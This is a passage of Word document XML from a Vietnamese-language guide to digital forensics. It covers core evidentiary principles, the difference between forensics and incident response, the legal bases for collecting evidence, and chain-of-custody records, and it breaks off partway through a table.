          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dùng công cụ, kỹ thuật đã được kiểm chứng để trích xuất thông tin liên quan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF0DC8">
      <w:pPr>
        <w:pStyle w:val="26"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>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Báo cáo và trình bày:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ghi lại phát hiện trong báo cáo rõ ràng, khách quan, có thể tái lập và phù hợp với thủ tục pháp lý.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="46002F21">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="nguyên-tắc-cốt-lõi"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1.3. Nguyên tắc cốt lõi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4890F75E">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Tính toàn vẹn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Không được làm thay đổi chứng cứ trong quá trình thu thập hoặc phân tích. Mọi thay đổi phải được ghi nhận, giải thích và công bố.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B80230D">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Chuỗi lưu giữ chứng cứ:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Hồ sơ liên tục ghi rõ ai đã thu thập, xử lý, chuyển giao, phân tích và lưu trữ chứng cứ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9083E8">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Khả năng tái lập:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Chuyên viên khác dùng cùng công cụ và phương pháp trên cùng chứng cứ phải có thể đi đến kết luận tương tự.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD6E2F2">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Tài liệu hóa:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mọi hành động đều phải được ghi chép, kể cả thử nghiệm thất bại, kết quả rỗng và phát hiện bất ngờ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1F7852">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Tính khách quan:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Báo cáo chính xác dù phát hiện ủng hộ hay bác bỏ giả thuyết điều tra.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562BF75C">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Thẩm quyền:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Việc thu thập phải dựa trên thẩm quyền hợp pháp như lệnh khám xét, sự đồng ý hoặc chính sách doanh nghiệp.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="43250A30">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="điều-tra-số-và-ứng-phó-sự-cố"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>1.4. Điều tra số và ứng phó sự cố</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1743"/>
        <w:gridCol w:w="8303"/>
      </w:tblGrid>
      <w:tr w14:paraId="1007E898">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6EA749C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Hoạt động</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1D75B28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Trọng tâm</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="299629F1">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4CB0720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Digital Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="410CDF4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Chứng cứ có thể dùng trước tòa, quy trình có phương pháp, bảo toàn bản gốc và chuỗi lưu giữ hợp pháp.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="19EB3D1C">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56D4F7B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Incident Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52A3073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Ưu tiên tốc độ, ngăn chặn kẻ tấn công ngay; việc bảo toàn chứng cứ có thể đứng sau yêu cầu cô lập sự cố.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32303D36">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55BF602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DFIR kết hợp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="126F0D5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Ứng phó nhanh nhưng vẫn giữ tính chặt chẽ pháp chứng; thu thập chứng cứ với tốc độ IR bằng phương pháp pháp chứng.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44C688FA">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:spacing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Cân nhắc pháp lý:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mọi hoạt động điều tra số phải được ủy quyền. Truy cập trái phép hệ thống máy tính, kể cả với mục đích “điều tra”, có thể là hành vi phạm pháp. Luôn có văn bản cho phép trước khi bắt đầu kiểm tra.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="7"/>
    <w:p w14:paraId="1B3EA672">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="khung-pháp-lý-và-chuỗi-lưu-giữ-chứng-cứ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2. Khung pháp lý và chuỗi lưu giữ chứng cứ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC4F64">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i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Tiêu chuẩn chứng cứ, thẩm quyền khám xét và khả năng được chấp nhận.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFEDDC8">
      <w:pPr>
        <w:pStyle w:val="3"/>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Chứng cứ số chỉ có giá trị khi được chấp nhận trước tòa hoặc trong quy trình kỷ luật. Chứng cứ thu thập không đúng thẩm quyền, bị xử lý sai hoặc được phân tích bằng phương pháp chưa được kiểm chứng có thể bị loại bỏ, bất kể nội dung buộc tội mạnh đến đâu. Vì vậy, khung pháp lý là nền tảng của toàn bộ công việc kỹ thuật.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B36BC6">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="thẩm-quyền-hợp-pháp-để-thu-thập-chứng-cứ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1. Thẩm quyền hợp pháp để thu thập chứng cứ</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2327"/>
        <w:gridCol w:w="7719"/>
      </w:tblGrid>
      <w:tr w14:paraId="5875E9A2">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3771170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Cơ sở</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F3B2B8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Ý nghĩa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3B06176C">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="65BB5C1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Lệnh khám xét (Search Warrant)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="260F5F9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Tòa án cho phép khám xét địa điểm cụ thể để tìm đối tượng cụ thể; thường là thẩm quyền mạnh nhất.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1847E24E">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="666A408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Sự đồng ý (Consent)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="09B3FD0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Chủ sở hữu tự nguyện cho phép kiểm tra thiết bị; phải được lập thành văn bản.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="304C8DDB">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="002E4EB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Tình thế khẩn cấp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D06050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Nguy cơ chứng cứ bị phá hủy cho phép hành động ngay mà chưa có lệnh, tùy pháp luật địa phương.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0CB066B3">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A4FEDE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Chính sách doanh nghiệp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="254C468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Người sử dụng lao động có thể kiểm tra thiết bị thuộc sở hữu công ty nếu điều này được quy định trong chính sách sử dụng chấp nhận được.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4948E805">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75D878A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Học thuyết bên thứ ba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33C502F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Dữ liệu do ISP hoặc nhà cung cấp đám mây giữ có thể có mức kỳ vọng riêng tư thấp hơn, tùy khu vực pháp lý.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="494C6BB3">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5DD5424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Hiệp định tương trợ tư pháp - MLAT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0731C15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Cơ chế hợp tác quốc tế để thu thập chứng cứ xuyên biên giới.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="032F6C97">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:left w:w="10" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
            <w:right w:w="10" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7DBFAEA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Thư yêu cầu bảo toàn</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3841" w:type="pct"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75520C7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Yêu cầu pháp lý buộc bên thứ ba giữ nguyên dữ liệu trong khi chờ thủ tục chính thức.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="9"/>
    </w:tbl>
    <w:p w14:paraId="63FFCD8B">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:keepNext/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="tài-liệu-chuỗi-lưu-giữ-chứng-cứ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2. Tài liệu chuỗi lưu giữ chứng cứ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF43714">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Chuỗi lưu giữ chứng cứ (Chain of Custody - CoC) là hồ sơ theo thời gian ghi lại việc nắm giữ, kiểm soát, chuyển giao và phân tích chứng cứ. Một mắt xích bị đứt có thể khiến chứng cứ bị tuyên không hợp lệ. Mỗi lần bàn giao đều phải được ghi nhận.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="13"/>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="autofit"/>
        <w:tblCellMar>
          <w:top w:w="0" w:type="dxa"/>
          <w:left w:w="10" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2159"/>
        <w:gridCol w:w="7887"/>
      </w:tblGrid>
      <w:tr w14:paraId="392BD96F">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41D501F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Hồ sơ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="17365D"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1ED28C3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Nội dung cần ghi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5154F0E6">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190EC73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Nhãn chứng cứ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30B5047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Mã vụ việc, mã vật chứng, ngày giờ, địa điểm và người thu thập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="025D3290">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0DB66EF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Phiếu thu thập</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F7FA"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15289B0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Thu thập vật gì, ở đâu, khi nào, bởi ai, ai chứng kiến và tình trạng thiết bị.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6DE3D0DC">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7F11490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Giá trị băm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="90" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="90" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1811427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MD5/SHA-256 của ảnh pháp chứng để chứng minh dữ liệu không thay đổi từ lúc thu thập.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7767C605">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5EE1219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Biên bản chuyển giao</w:t>
            </w:r>
          </w:p>
